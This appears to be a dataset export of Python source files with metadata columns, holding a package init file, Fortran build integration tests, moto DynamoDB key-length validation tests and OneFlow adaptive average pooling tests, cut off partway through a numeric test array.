| 0.118033
| 0.855738
| 0.855738
| 0.855738
| 0.855738
| 0.734426
| 0.734426
| 0
| 0
| 0.209302
| 989
| 37
| 76
| 26.72973
| 0.780051
| 0
| 0
| 0.666667
| 0
| 0
| 0.054601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.066667
| 0.066667
| 0.466667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cc0b1ec3c4b4be7b725297afb96da72642e0929
| 116
|
py
|
Python
|
src/rxn_network/costs/__init__.py
|
GENESIS-EFRC/reaction-network
|
1482ac1b6b550a5bc9961e9210e33c86c07f64cf
|
[
"BSD-3-Clause-LBNL"
] | 29
|
2020-08-04T07:07:04.000Z
|
2022-02-22T22:09:20.000Z
|
src/rxn_network/costs/__init__.py
|
GENESIS-EFRC/reaction-network
|
1482ac1b6b550a5bc9961e9210e33c86c07f64cf
|
[
"BSD-3-Clause-LBNL"
] | 70
|
2021-02-22T07:01:40.000Z
|
2022-03-31T20:11:56.000Z
|
src/rxn_network/costs/__init__.py
|
GENESIS-EFRC/reaction-network
|
1482ac1b6b550a5bc9961e9210e33c86c07f64cf
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2021-04-20T09:29:39.000Z
|
2022-02-02T17:43:52.000Z
|
from rxn_network.costs.calculators import ChempotDistanceCalculator
from rxn_network.costs.softplus import Softplus
| 38.666667
| 67
| 0.896552
| 14
| 116
| 7.285714
| 0.571429
| 0.137255
| 0.27451
| 0.372549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 116
| 2
| 68
| 58
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7cff722f72bdcd49a46a4df7b9154b6fa4d6b435
| 753
|
py
|
Python
|
test/integration/languages/test_fortran.py
|
thomasrockhu/bfg9000
|
1cd1226eab9bed2fc2ec6acccf7864fdcf2ed31a
|
[
"BSD-3-Clause"
] | 72
|
2015-06-23T02:35:13.000Z
|
2021-12-08T01:47:40.000Z
|
test/integration/languages/test_fortran.py
|
thomasrockhu/bfg9000
|
1cd1226eab9bed2fc2ec6acccf7864fdcf2ed31a
|
[
"BSD-3-Clause"
] | 139
|
2015-03-01T18:48:17.000Z
|
2021-06-18T15:45:14.000Z
|
test/integration/languages/test_fortran.py
|
thomasrockhu/bfg9000
|
1cd1226eab9bed2fc2ec6acccf7864fdcf2ed31a
|
[
"BSD-3-Clause"
] | 19
|
2015-12-23T21:24:33.000Z
|
2022-01-06T04:04:41.000Z
|
import os.path
from .. import *
@skip_if('fortran' not in test_features, 'skipping fortran tests')
class TestF77(IntegrationTest):
    """Integration test building and running the F77 sample project."""

    def __init__(self, *args, **kwargs):
        srcdir = os.path.join('languages', 'f77')
        super().__init__(srcdir, *args, **kwargs)

    def test_build(self):
        exe = executable('program')
        self.build(exe)
        self.assertOutput([exe], ' hello from f77!\n')
@skip_if('fortran' not in test_features, 'skipping fortran tests')
class TestF95(IntegrationTest):
    """Integration test building and running the F95 sample project."""

    def __init__(self, *args, **kwargs):
        srcdir = os.path.join('languages', 'f95')
        super().__init__(srcdir, *args, **kwargs)

    def test_build(self):
        exe = executable('program')
        self.build(exe)
        self.assertOutput([exe], ' hello from f95!\n')
| 31.375
| 75
| 0.661355
| 91
| 753
| 5.230769
| 0.362637
| 0.084034
| 0.054622
| 0.067227
| 0.894958
| 0.894958
| 0.894958
| 0.894958
| 0.894958
| 0.894958
| 0
| 0.019169
| 0.168659
| 753
| 23
| 76
| 32.73913
| 0.741214
| 0
| 0
| 0.5
| 0
| 0
| 0.193891
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.25
| false
| 0
| 0.125
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b04c7c05e124f8d5b8593f1551b3aef44c7dc39
| 11,130
|
py
|
Python
|
tests/test_dynamodb/exceptions/test_key_length_exceptions.py
|
symroe/moto
|
4e106995af6f2820273528fca8a4e9ee288690a5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_dynamodb/exceptions/test_key_length_exceptions.py
|
symroe/moto
|
4e106995af6f2820273528fca8a4e9ee288690a5
|
[
"Apache-2.0"
] | 1
|
2022-03-07T07:39:03.000Z
|
2022-03-07T07:39:03.000Z
|
tests/test_dynamodb/exceptions/test_key_length_exceptions.py
|
symroe/moto
|
4e106995af6f2820273528fca8a4e9ee288690a5
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import boto3
import sure # noqa # pylint: disable=unused-import
import pytest
from moto import mock_dynamodb
from botocore.exceptions import ClientError
from moto.dynamodb.limits import HASH_KEY_MAX_LENGTH, RANGE_KEY_MAX_LENGTH
@mock_dynamodb
def test_item_add_long_string_hash_key_exception():
    """A hash key longer than HASH_KEY_MAX_LENGTH must raise ValidationException."""
    name = "TestTable"
    conn = boto3.client("dynamodb", region_name="us-west-2")
    conn.create_table(
        TableName=name,
        KeySchema=[{"AttributeName": "forum_name", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "forum_name", "AttributeType": "S"}],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    def make_item(hash_key_len):
        # Same item as before, parameterized on the hash-key length.
        return {
            "forum_name": {"S": "x" * hash_key_len},
            "subject": {"S": "Check this out!"},
            "Body": {"S": "http://url_to_lolcat.gif"},
            "SentBy": {"S": "test"},
            "ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
        }

    # A key of exactly the maximum length is accepted.
    conn.put_item(TableName=name, Item=make_item(HASH_KEY_MAX_LENGTH))

    # One extra character pushes the key over the limit and is rejected.
    with pytest.raises(ClientError) as ex:
        conn.put_item(TableName=name, Item=make_item(HASH_KEY_MAX_LENGTH + 1))
    err = ex.value.response["Error"]
    err["Code"].should.equal("ValidationException")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    # deliberately no space between "of" and "2048"
    err["Message"].should.equal(
        "One or more parameter values were invalid: Size of hashkey has exceeded the maximum size limit of2048 bytes"
    )
@mock_dynamodb
def test_item_add_long_string_nonascii_hash_key_exception():
    """The hash-key length limit is enforced in UTF-8 bytes, not characters."""
    name = "TestTable"
    conn = boto3.client("dynamodb", region_name="us-west-2")
    conn.create_table(
        TableName=name,
        KeySchema=[{"AttributeName": "forum_name", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "forum_name", "AttributeType": "S"}],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )
    emoji_b = b"\xf0\x9f\x98\x83"  # smile emoji
    emoji = emoji_b.decode("utf-8")  # 1 character, but 4 bytes
    # Fill the key with emoji up to exactly HASH_KEY_MAX_LENGTH bytes.
    short_enough = emoji * int(HASH_KEY_MAX_LENGTH / len(emoji.encode("utf-8")))
    # Prepending a single 1-byte character pushes the key over the byte limit.
    too_long = "x" + short_enough
    # Exactly at the byte limit: accepted.
    conn.put_item(
        TableName=name,
        Item={
            "forum_name": {"S": short_enough},
            "subject": {"S": "Check this out!"},
            "Body": {"S": "http://url_to_lolcat.gif"},
            "SentBy": {"S": "test"},
            "ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
        },
    )
    # One byte over the limit: rejected with ValidationException.
    with pytest.raises(ClientError) as ex:
        conn.put_item(
            TableName=name,
            Item={
                "forum_name": {"S": too_long},
                "subject": {"S": "Check this out!"},
                "Body": {"S": "http://url_to_lolcat.gif"},
                "SentBy": {"S": "test"},
                "ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
            },
        )
    ex.value.response["Error"]["Code"].should.equal("ValidationException")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    # deliberately no space between "of" and "2048"
    ex.value.response["Error"]["Message"].should.equal(
        "One or more parameter values were invalid: Size of hashkey has exceeded the maximum size limit of2048 bytes"
    )
@mock_dynamodb
def test_item_add_long_string_range_key_exception():
    """A range key longer than RANGE_KEY_MAX_LENGTH must raise ValidationException."""
    name = "TestTable"
    conn = boto3.client("dynamodb", region_name="us-west-2")
    conn.create_table(
        TableName=name,
        KeySchema=[
            {"AttributeName": "forum_name", "KeyType": "HASH"},
            {"AttributeName": "ReceivedTime", "KeyType": "RANGE"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "forum_name", "AttributeType": "S"},
            {"AttributeName": "ReceivedTime", "AttributeType": "S"},
        ],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )
    # A range key of exactly the maximum length is accepted.
    conn.put_item(
        TableName=name,
        Item={
            "forum_name": {"S": "LOLCat Forum"},
            "subject": {"S": "Check this out!"},
            "Body": {"S": "http://url_to_lolcat.gif"},
            "SentBy": {"S": "someone@somewhere.edu"},
            "ReceivedTime": {"S": "x" * RANGE_KEY_MAX_LENGTH},
        },
    )
    # One extra character pushes the range key over the limit: rejected.
    with pytest.raises(ClientError) as ex:
        conn.put_item(
            TableName=name,
            Item={
                "forum_name": {"S": "LOLCat Forum"},
                "subject": {"S": "Check this out!"},
                "Body": {"S": "http://url_to_lolcat.gif"},
                "SentBy": {"S": "someone@somewhere.edu"},
                "ReceivedTime": {"S": "x" * (RANGE_KEY_MAX_LENGTH + 1)},
            },
        )
    ex.value.response["Error"]["Code"].should.equal("ValidationException")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    ex.value.response["Error"]["Message"].should.equal(
        "One or more parameter values were invalid: Aggregated size of all range keys has exceeded the size limit of 1024 bytes"
    )
@mock_dynamodb
def test_put_long_string_gsi_range_key_exception():
    """The range-key length limit also applies to attributes used as a GSI range key."""
    name = "TestTable"
    conn = boto3.client("dynamodb", region_name="us-west-2")
    conn.create_table(
        TableName=name,
        KeySchema=[
            {"AttributeName": "partition_key", "KeyType": "HASH"},
            {"AttributeName": "sort_key", "KeyType": "RANGE"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "partition_key", "AttributeType": "S"},
            {"AttributeName": "sort_key", "AttributeType": "S"},
        ],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )
    # Before the GSI exists, an over-long value is fine as a HASH key.
    conn.put_item(
        TableName=name,
        Item={
            # partition_key is only used as the HASH key
            # so we can set it to range key length
            "partition_key": {"S": "x" * (RANGE_KEY_MAX_LENGTH + 1)},
            "sort_key": {"S": "sk"},
        },
    )
    # Add a GSI in which partition_key becomes the RANGE key.
    conn.update_table(
        TableName=name,
        AttributeDefinitions=[
            {"AttributeName": "partition_key", "AttributeType": "S"},
            {"AttributeName": "sort_key", "AttributeType": "S"},
        ],
        GlobalSecondaryIndexUpdates=[
            {
                "Create": {
                    "IndexName": "random-table-index",
                    "KeySchema": [
                        {"AttributeName": "sort_key", "KeyType": "HASH"},
                        {"AttributeName": "partition_key", "KeyType": "RANGE"},
                    ],
                    "Projection": {"ProjectionType": "KEYS_ONLY"},
                    "ProvisionedThroughput": {
                        "ReadCapacityUnits": 20,
                        "WriteCapacityUnits": 20,
                    },
                }
            },
        ],
    )
    # With the GSI in place, the same over-long value must now be rejected.
    with pytest.raises(ClientError) as ex:
        conn.put_item(
            TableName=name,
            Item={
                # partition_key is used as a range key in the GSI
                # so updating this should still fail
                "partition_key": {"S": "y" * (RANGE_KEY_MAX_LENGTH + 1)},
                "sort_key": {"S": "sk2"},
            },
        )
    ex.value.response["Error"]["Code"].should.equal("ValidationException")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    ex.value.response["Error"]["Message"].should.equal(
        "One or more parameter values were invalid: Aggregated size of all range keys has exceeded the size limit of 1024 bytes"
    )
@mock_dynamodb
def test_update_item_with_long_string_hash_key_exception():
    """UpdateItem rejects hash keys longer than HASH_KEY_MAX_LENGTH."""
    table_name = "TestTable"
    client = boto3.client("dynamodb", region_name="us-west-2")
    client.create_table(
        TableName=table_name,
        KeySchema=[{"AttributeName": "forum_name", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "forum_name", "AttributeType": "S"}],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    def update_with_hash_key_of_length(length):
        # Only the forum_name (hash key) length varies between calls.
        client.update_item(
            TableName=table_name,
            Key={
                "forum_name": {"S": "x" * length},
                "ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
            },
            UpdateExpression="set body=:New",
            ExpressionAttributeValues={":New": {"S": "hello"}},
        )

    # A hash key at exactly the limit is accepted.
    update_with_hash_key_of_length(HASH_KEY_MAX_LENGTH)

    # One character past the limit must fail.
    with pytest.raises(ClientError) as ex:
        update_with_hash_key_of_length(HASH_KEY_MAX_LENGTH + 1)
    error = ex.value.response["Error"]
    error["Code"].should.equal("ValidationException")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    # deliberately no space between "of" and "2048"
    error["Message"].should.equal(
        "One or more parameter values were invalid: Size of hashkey has exceeded the maximum size limit of2048 bytes"
    )
@mock_dynamodb
def test_update_item_with_long_string_range_key_exception():
    """UpdateItem rejects range keys longer than RANGE_KEY_MAX_LENGTH."""
    table_name = "TestTable"
    client = boto3.client("dynamodb", region_name="us-west-2")
    client.create_table(
        TableName=table_name,
        KeySchema=[
            {"AttributeName": "forum_name", "KeyType": "HASH"},
            {"AttributeName": "ReceivedTime", "KeyType": "RANGE"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "forum_name", "AttributeType": "S"},
            {"AttributeName": "ReceivedTime", "AttributeType": "S"},
        ],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    def update_with_range_key_of_length(length):
        # Only the ReceivedTime (range key) length varies between calls.
        client.update_item(
            TableName=table_name,
            Key={
                "forum_name": {"S": "Lolcat Forum"},
                "ReceivedTime": {"S": "x" * length},
            },
            UpdateExpression="set body=:New",
            ExpressionAttributeValues={":New": {"S": "hello"}},
        )

    # A range key at exactly the limit is accepted.
    update_with_range_key_of_length(RANGE_KEY_MAX_LENGTH)

    # One character past the limit must fail.
    with pytest.raises(ClientError) as ex:
        update_with_range_key_of_length(RANGE_KEY_MAX_LENGTH + 1)
    error = ex.value.response["Error"]
    error["Code"].should.equal("ValidationException")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    # deliberately no space between "of" and "2048"
    error["Message"].should.equal(
        "One or more parameter values were invalid: Aggregated size of all range keys has exceeded the size limit of 1024 bytes"
    )
| 37.22408
| 128
| 0.568733
| 1,138
| 11,130
| 5.408612
| 0.150264
| 0.029245
| 0.043867
| 0.038993
| 0.863363
| 0.863363
| 0.863363
| 0.863038
| 0.850041
| 0.838993
| 0
| 0.022583
| 0.275921
| 11,130
| 298
| 129
| 37.348993
| 0.741159
| 0.037646
| 0
| 0.70155
| 0
| 0.011628
| 0.317349
| 0.005889
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.027132
| 0
| 0.050388
| 0.003876
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b05177e8aa303cd994a9686466942c207d6c264
| 33,665
|
py
|
Python
|
oneflow/python/test/modules/test_adaptive_pool.py
|
xcnick/oneflow
|
7b786b27069dec35d2493256011e773988c91f56
|
[
"Apache-2.0"
] | null | null | null |
oneflow/python/test/modules/test_adaptive_pool.py
|
xcnick/oneflow
|
7b786b27069dec35d2493256011e773988c91f56
|
[
"Apache-2.0"
] | null | null | null |
oneflow/python/test/modules/test_adaptive_pool.py
|
xcnick/oneflow
|
7b786b27069dec35d2493256011e773988c91f56
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
import oneflow.experimental as flow
from test_util import GenArgList
# TODO: auto test
def _test_adaptive_avgpool1d_forward(test_case, device):
    """Module and functional AdaptiveAvgPool1d agree with reference output."""
    samples = [
        0.05580734834074974, -0.6875145435333252, -1.654430866241455,
        -0.6225992441177368, 0.10183599591255188, 0.05019790679216385,
        -1.2537643909454346, 0.14907236397266388,
    ]
    x = flow.Tensor(
        np.array([[samples]]),
        dtype=flow.float32,
        device=flow.device(device),
    )
    pool = flow.nn.AdaptiveAvgPool1d(4)
    pool.to(device)
    module_out = pool(x)
    functional_out = flow.adaptive_avg_pool1d(x, 4)
    # Each of the 4 outputs is the mean of a consecutive pair of inputs.
    expected = np.array(
        [[[-0.31585359573364258, -1.13851499557495117,
           0.07601694762706757, -0.55234599113464355]]]
    )
    test_case.assertTrue(np.allclose(module_out.numpy(), expected, 1e-5, 1e-5))
    test_case.assertTrue(np.allclose(functional_out.numpy(), expected, 1e-5, 1e-5))
def _test_adaptive_avgpool1d_backward(test_case, device):
    """Gradient of summed AdaptiveAvgPool1d(4) output is a uniform 1/2."""
    samples = [
        0.05580734834074974, -0.6875145435333252, -1.654430866241455,
        -0.6225992441177368, 0.10183599591255188, 0.05019790679216385,
        -1.2537643909454346, 0.14907236397266388,
    ]
    x = flow.Tensor(
        np.array([[samples]]),
        dtype=flow.float32,
        device=flow.device(device),
        requires_grad=True,
    )
    pool = flow.nn.AdaptiveAvgPool1d(4)
    pool(x).sum().backward()
    # Each output averages exactly 2 inputs, so d(sum)/d(input) = 1/2.
    expected_grad = np.array([[[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5]]])
    test_case.assertTrue(np.allclose(x.grad.numpy(), expected_grad, 1e-5, 1e-5))
@unittest.skipIf(
    not flow.unittest.env.eager_execution_enabled(),
    ".numpy() doesn't work in lazy mode",
)
# NOTE(review): unittest.skipIf on a plain helper (not a TestCase method)
# wraps the function so that, when the condition is true, calling it raises
# SkipTest; none of the sibling helpers carry this guard — confirm the
# placement is intentional.
def _test_adaptive_avgpool2d_forward(test_case, device):
    # Verifies flow.nn.AdaptiveAvgPool2d((2, 2)) and the functional
    # flow.adaptive_avg_pool2d against precomputed reference values for a
    # 1x1x4x4 input.
    input = flow.Tensor(
        np.array(
            [[[
                [0.10039155930280685, 0.04879157617688179, -1.0515470504760742, 0.9466001987457275],
                [0.45375481247901917, 0.23611211776733398, 1.343685269355774, 0.3979687988758087],
                [0.05580734834074974, -0.6875145435333252, -1.654430866241455, -0.6225992441177368],
                [0.10183599591255188, 0.05019790679216385, -1.2537643909454346, 0.14907236397266388],
            ]]]
        ),
        dtype=flow.float32,
        device=flow.device(device),
    )
    m = flow.nn.AdaptiveAvgPool2d((2, 2))
    m.to(device)
    of_out_1 = m(input)
    of_out_2 = flow.adaptive_avg_pool2d(input, (2, 2))
    # Each output cell is the mean of the corresponding 2x2 input patch.
    np_out = np.array(
        [[[
            [0.20976251363754272, 0.4091767966747284],
            [-0.1199183315038681, -0.8454304933547974],
        ]]]
    )
    test_case.assertTrue(np.allclose(of_out_1.numpy(), np_out, 1e-5, 1e-5))
    test_case.assertTrue(np.allclose(of_out_2.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool2d_backward(test_case, device):
    """Gradient of summed AdaptiveAvgPool2d((2, 2)) output is a uniform 1/4."""
    rows = [
        [0.10039155930280685, 0.04879157617688179, -1.0515470504760742, 0.9466001987457275],
        [0.45375481247901917, 0.23611211776733398, 1.343685269355774, 0.3979687988758087],
        [0.05580734834074974, -0.6875145435333252, -1.654430866241455, -0.6225992441177368],
        [0.10183599591255188, 0.05019790679216385, -1.2537643909454346, 0.14907236397266388],
    ]
    x = flow.Tensor(
        np.array([[rows]]),
        dtype=flow.float32,
        device=flow.device(device),
        requires_grad=True,
    )
    pool = flow.nn.AdaptiveAvgPool2d((2, 2))
    pool(x).sum().backward()
    # Each 2x2 output cell averages four inputs, so d(sum)/d(input) = 1/4.
    expected_grad = np.full((1, 1, 4, 4), 0.25)
    test_case.assertTrue(np.allclose(x.grad.numpy(), expected_grad, 1e-5, 1e-5))
def _test_adaptive_avgpool2d_hw_forward(test_case, device):
    """Non-square output size (1, 2) produces the expected pooled values."""
    rows = [
        [0.28242185711860657, -0.7742040753364563, -0.5439430475234985],
        [-0.1706847995519638, 0.0430854931473732, 0.34247592091560364],
        [-1.036131501197815, -1.033642292022705, 0.3455536365509033],
    ]
    x = flow.Tensor(
        np.array([[rows]]),
        dtype=flow.float32,
        device=flow.device(device),
    )
    pool = flow.nn.AdaptiveAvgPool2d((1, 2))
    pool.to(device)
    result = pool(x)
    expected = np.array([[[[-0.4481925666332245, -0.27011242508888245]]]])
    test_case.assertTrue(np.allclose(result.numpy(), expected, 1e-5, 1e-5))
def _test_adaptive_avgpool2d_hw_backward(test_case, device):
    """Gradient of summed AdaptiveAvgPool2d((1, 2)) output over a 3x3 input."""
    rows = [
        [0.28242185711860657, -0.7742040753364563, -0.5439430475234985],
        [-0.1706847995519638, 0.0430854931473732, 0.34247592091560364],
        [-1.036131501197815, -1.033642292022705, 0.3455536365509033],
    ]
    x = flow.Tensor(
        np.array([[rows]]),
        dtype=flow.float32,
        device=flow.device(device),
        requires_grad=True,
    )
    pool = flow.nn.AdaptiveAvgPool2d((1, 2))
    pool(x).sum().backward()
    # The middle column is shared between the two overlapping 3x2 windows,
    # so it receives twice the gradient of the edge columns (in float32).
    grad_row = [0.1666666716337204, 0.3333333432674408, 0.1666666716337204]
    expected_grad = np.array([[[grad_row, grad_row, grad_row]]])
    test_case.assertTrue(np.allclose(x.grad.numpy(), expected_grad, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_forward(test_case, device):
    # Checks flow.nn.AdaptiveAvgPool3d((2, 2, 2)) and the functional
    # flow.adaptive_avg_pool3d against precomputed reference values for a
    # 1x1x4x4x4 input pooled down to 2x2x2.
    input = flow.Tensor(
        np.array(
            [[[
                [
                    [-1.07757179960088489, -0.78045388903658375, -1.26275387521194427, 0.99935071451204771],
                    [2.02225324891575164, 1.10345137769946500, -0.43773247548795780, 1.89049181058751703],
                    [-0.55938618990646538, -0.49495202415265188, -0.18536721363519787, -0.60989698667757719],
                    [-1.65362152601718160, -1.03925835404367861, 0.36867765976139671, -0.53568828349518050],
                ],
                [
                    [-1.26179006644499525, -1.43909210916315322, 0.20654399652431357, 0.81864721019067133],
                    [-0.30333788634000142, -0.81732697640762930, -0.37675150976256139, -0.11021655039337777],
                    [-0.22977043608192885, 1.27171963666499055, -0.47908512978782908, -1.44953694047278558],
                    [-1.28020932869777826, -0.11184514806663474, 1.70221670872109843, -1.73548372877253554],
                ],
                [
                    [2.47064979917736061, -0.65497026319732976, -0.93181070795716758, 1.46529042716824276],
                    [1.14198642343413970, 1.38990908108600797, 0.96578419005255678, -0.85631142649766190],
                    [0.19515087084250754, -0.37808457398571094, 0.29386253984961830, 0.92799305103533269],
                    [-0.93741182779940069, 0.33418317304524309, -0.27925427653038332, 0.38029090707066726],
                ],
                [
                    [0.59186866597360410, -0.78706310899389020, -0.95343448742453918, 0.31341612954718795],
                    [0.75090294441452277, -0.92992883985623231, -0.73430540527824761, -0.88064815906966942],
                    [-0.47078530163539850, 0.12253641652645629, 0.50880220398328457, 0.52039178932756203],
                    [-0.08613006511636320, 0.30291348404866386, -0.62685658736801231, -0.27469204305759976],
                ],
            ]]]
        ),
        dtype=flow.float32,
        device=flow.device(device),
    )
    m = flow.nn.AdaptiveAvgPool3d((2, 2, 2))
    m.to(device)
    of_out_1 = m(input)
    of_out_2 = flow.adaptive_avg_pool3d(input, (2, 2, 2))
    # Each output cell is the mean of the corresponding 2x2x2 input window.
    np_out = np.array(
        [[[
            [
                [-0.31923351254725391, 0.21594741511983859],
                [-0.51216542128766618, -0.36552048929482639],
            ],
            [
                [0.49666933775477279, -0.20150242993241230],
                [-0.11470347800925032, 0.18131719803880864],
            ],
        ]]]
    )
    test_case.assertTrue(np.allclose(of_out_1.numpy(), np_out, 1e-5, 1e-5))
    test_case.assertTrue(np.allclose(of_out_2.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_backward(test_case, device):
    # Backward pass of flow.nn.AdaptiveAvgPool3d((2, 2, 2)) on a 1x1x4x4x4
    # input: every input element contributes to exactly one 2x2x2 averaging
    # window, so d(sum)/d(input) is a uniform 1/8.
    input = flow.Tensor(
        np.array(
            [[[
                [
                    [-1.07757179960088489, -0.78045388903658375, -1.26275387521194427, 0.99935071451204771],
                    [2.02225324891575164, 1.10345137769946500, -0.43773247548795780, 1.89049181058751703],
                    [-0.55938618990646538, -0.49495202415265188, -0.18536721363519787, -0.60989698667757719],
                    [-1.65362152601718160, -1.03925835404367861, 0.36867765976139671, -0.53568828349518050],
                ],
                [
                    [-1.26179006644499525, -1.43909210916315322, 0.20654399652431357, 0.81864721019067133],
                    [-0.30333788634000142, -0.81732697640762930, -0.37675150976256139, -0.11021655039337777],
                    [-0.22977043608192885, 1.27171963666499055, -0.47908512978782908, -1.44953694047278558],
                    [-1.28020932869777826, -0.11184514806663474, 1.70221670872109843, -1.73548372877253554],
                ],
                [
                    [2.47064979917736061, -0.65497026319732976, -0.93181070795716758, 1.46529042716824276],
                    [1.14198642343413970, 1.38990908108600797, 0.96578419005255678, -0.85631142649766190],
                    [0.19515087084250754, -0.37808457398571094, 0.29386253984961830, 0.92799305103533269],
                    [-0.93741182779940069, 0.33418317304524309, -0.27925427653038332, 0.38029090707066726],
                ],
                [
                    [0.59186866597360410, -0.78706310899389020, -0.95343448742453918, 0.31341612954718795],
                    [0.75090294441452277, -0.92992883985623231, -0.73430540527824761, -0.88064815906966942],
                    [-0.47078530163539850, 0.12253641652645629, 0.50880220398328457, 0.52039178932756203],
                    [-0.08613006511636320, 0.30291348404866386, -0.62685658736801231, -0.27469204305759976],
                ],
            ]]]
        ),
        dtype=flow.float32,
        device=flow.device(device),
        requires_grad=True,
    )
    m = flow.nn.AdaptiveAvgPool3d((2, 2, 2))
    of_out = m(input)
    of_out = of_out.sum()
    of_out.backward()
    np_grad = np.array(
        [[[
            [
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
            ],
            [
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
            ],
            [
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
            ],
            [
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
                [0.125, 0.125, 0.125, 0.125],
            ],
        ]]]
    )
    test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_dhw_forward(test_case, device):
    # Non-cubic output size (1, 2, 3) on a 1x1x4x4x4 input, checked against
    # precomputed reference values.
    input = flow.Tensor(
        np.array(
            [[[
                [
                    [-1.07757179960088489, -0.78045388903658375, -1.26275387521194427, 0.99935071451204771],
                    [2.02225324891575164, 1.10345137769946500, -0.43773247548795780, 1.89049181058751703],
                    [-0.55938618990646538, -0.49495202415265188, -0.18536721363519787, -0.60989698667757719],
                    [-1.65362152601718160, -1.03925835404367861, 0.36867765976139671, -0.53568828349518050],
                ],
                [
                    [-1.26179006644499525, -1.43909210916315322, 0.20654399652431357, 0.81864721019067133],
                    [-0.30333788634000142, -0.81732697640762930, -0.37675150976256139, -0.11021655039337777],
                    [-0.22977043608192885, 1.27171963666499055, -0.47908512978782908, -1.44953694047278558],
                    [-1.28020932869777826, -0.11184514806663474, 1.70221670872109843, -1.73548372877253554],
                ],
                [
                    [2.47064979917736061, -0.65497026319732976, -0.93181070795716758, 1.46529042716824276],
                    [1.14198642343413970, 1.38990908108600797, 0.96578419005255678, -0.85631142649766190],
                    [0.19515087084250754, -0.37808457398571094, 0.29386253984961830, 0.92799305103533269],
                    [-0.93741182779940069, 0.33418317304524309, -0.27925427653038332, 0.38029090707066726],
                ],
                [
                    [0.59186866597360410, -0.78706310899389020, -0.95343448742453918, 0.31341612954718795],
